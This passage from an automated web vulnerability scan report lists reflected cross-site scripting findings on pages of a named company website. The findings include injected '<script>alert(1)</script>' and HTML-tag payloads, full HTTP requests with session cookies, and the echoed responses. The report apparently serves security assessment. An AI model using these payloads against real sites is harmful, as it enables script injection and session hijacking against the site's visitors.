<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/nemo-outdoor-560-proudly-presents-new-lte-parameter-improvements-and-support-for-rohde-a-schwarz-tsmw-lte-scanning-receiver.html?Itemid=4298bd59"><a>31f92cdf09&nomore=true#up">
...[SNIP]...

1.161. http://anite.com/nemo-outdoor-560-proudly-presents-new-lte-parameter-improvements-and-support-for-rohde-a-schwarz-tsmw-lte-scanning-receiver.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/nemo-outdoor-560-proudly-presents-new-lte-parameter-improvements-and-support-for-rohde-a-schwarz-tsmw-lte-scanning-receiver.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98744"><script>alert(1)</script>7283446bf52 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /98744"><script>alert(1)</script>7283446bf52 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:19:34 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:19:34 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/98744"><script>alert(1)</script>7283446bf52#up">
...[SNIP]...

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/nemo-outdoor-560-proudly-presents-new-lte-parameter-improvements-and-support-for-rohde-a-schwarz-tsmw-lte-scanning-receiver.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fe32"><a>803f0f63363 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nemo-outdoor-560-proudly-presents-new-lte-parameter-improvements-and-support-for-rohde-a-schwarz-tsmw-lte-scanning-receiver.html?6fe32"><a>803f0f63363=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:19:15 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:19:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/nemo-outdoor-560-proudly-presents-new-lte-parameter-improvements-and-support-for-rohde-a-schwarz-tsmw-lte-scanning-receiver.html?6fe32"><a>803f0f63363=1#up">
...[SNIP]...

1.163. http://anite.com/nemo-outdoor-561-released-with-support-for-lte-benchmarking.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/nemo-outdoor-561-released-with-support-for-lte-benchmarking.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c706"><a>91044eeda05 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nemo-outdoor-561-released-with-support-for-lte-benchmarking.html?Itemid=4295c706"><a>91044eeda05&nomore=true HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:19:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:19:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/nemo-outdoor-561-released-with-support-for-lte-benchmarking.html?Itemid=4295c706"><a>91044eeda05&nomore=true#up">
...[SNIP]...

1.164. http://anite.com/nemo-outdoor-561-released-with-support-for-lte-benchmarking.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/nemo-outdoor-561-released-with-support-for-lte-benchmarking.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2a27"><script>alert(1)</script>b4d60eff488 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b2a27"><script>alert(1)</script>b4d60eff488 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:19:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:19:11 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/b2a27"><script>alert(1)</script>b4d60eff488#up">
...[SNIP]...

1.165. http://anite.com/nemo-outdoor-561-released-with-support-for-lte-benchmarking.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/nemo-outdoor-561-released-with-support-for-lte-benchmarking.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4827"><a>664446fe3a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nemo-outdoor-561-released-with-support-for-lte-benchmarking.html?e4827"><a>664446fe3a0=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:18:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:18:51 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/nemo-outdoor-561-released-with-support-for-lte-benchmarking.html?e4827"><a>664446fe3a0=1#up">
...[SNIP]...

1.166. http://anite.com/nemo-sales-contacts [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/nemo-sales-contacts

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab245"><script>alert(1)</script>61457caaaec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nemo-sales-contactsab245"><script>alert(1)</script>61457caaaec HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:13:40 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:13:40 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/nemo-sales-contactsab245"><script>alert(1)</script>61457caaaec#up">
...[SNIP]...

1.167. http://anite.com/nemo-sales-contacts [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/nemo-sales-contacts

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99c12"><a>80a39fd9825 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nemo-sales-contacts?99c12"><a>80a39fd9825=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:13:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:13:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/nemo-sales-contacts?99c12"><a>80a39fd9825=1#up">
...[SNIP]...

1.168. http://anite.com/nemo-sales-contacts-europe.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/nemo-sales-contacts-europe.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d9ee"><a>5e28480dff1 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nemo-sales-contacts-europe.html?Itemid=4872d9ee"><a>5e28480dff1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:19:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:19:37 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/nemo-sales-contacts-europe.html?Itemid=4872d9ee"><a>5e28480dff1#up">
...[SNIP]...

1.169. http://anite.com/nemo-sales-contacts-europe.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/nemo-sales-contacts-europe.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6655"><script>alert(1)</script>9d16f0a3d64 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /d6655"><script>alert(1)</script>9d16f0a3d64 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:19:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:19:44 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/d6655"><script>alert(1)</script>9d16f0a3d64#up">
...[SNIP]...

1.170. http://anite.com/nemo-sales-contacts-europe.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/nemo-sales-contacts-europe.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45c4c"><a>4dac81e8e9c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nemo-sales-contacts-europe.html?45c4c"><a>4dac81e8e9c=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:19:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:19:24 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/nemo-sales-contacts-europe.html?45c4c"><a>4dac81e8e9c=1#up">
...[SNIP]...

1.171. http://anite.com/nemo-technical-support-network-2.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/nemo-technical-support-network-2.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a99a1"><a>bec5ce4e3fb was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nemo-technical-support-network-2.html?Itemid=439a99a1"><a>bec5ce4e3fb HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:11:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:11:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/nemo-technical-support-network-2.html?Itemid=439a99a1"><a>bec5ce4e3fb#up">
...[SNIP]...

1.172. http://anite.com/nemo-technical-support-network-2.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/nemo-technical-support-network-2.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba2ac"><script>alert(1)</script>17f5ac5dd95 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ba2ac"><script>alert(1)</script>17f5ac5dd95 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:11:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:11:23 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/ba2ac"><script>alert(1)</script>17f5ac5dd95#up">
...[SNIP]...

1.173. http://anite.com/nemo-technical-support-network-2.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/nemo-technical-support-network-2.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b449"><a>274b18ab414 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nemo-technical-support-network-2.html?3b449"><a>274b18ab414=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:11:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:11:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/nemo-technical-support-network-2.html?3b449"><a>274b18ab414=1#up">
...[SNIP]...

1.174. http://anite.com/nemo-wireless-network-measurement-solutions-anite.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/nemo-wireless-network-measurement-solutions-anite.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6ecb"><a>20fd1cea193 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nemo-wireless-network-measurement-solutions-anite.html?Itemid=59d6ecb"><a>20fd1cea193 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:09:13 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:09:14 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/nemo-wireless-network-measurement-solutions-anite.html?Itemid=59d6ecb"><a>20fd1cea193#up">
...[SNIP]...

1.175. http://anite.com/nemo-wireless-network-measurement-solutions-anite.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/nemo-wireless-network-measurement-solutions-anite.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca6f1"><script>alert(1)</script>e3cc205f34c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca6f1"><script>alert(1)</script>e3cc205f34c HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:09:17 GMT
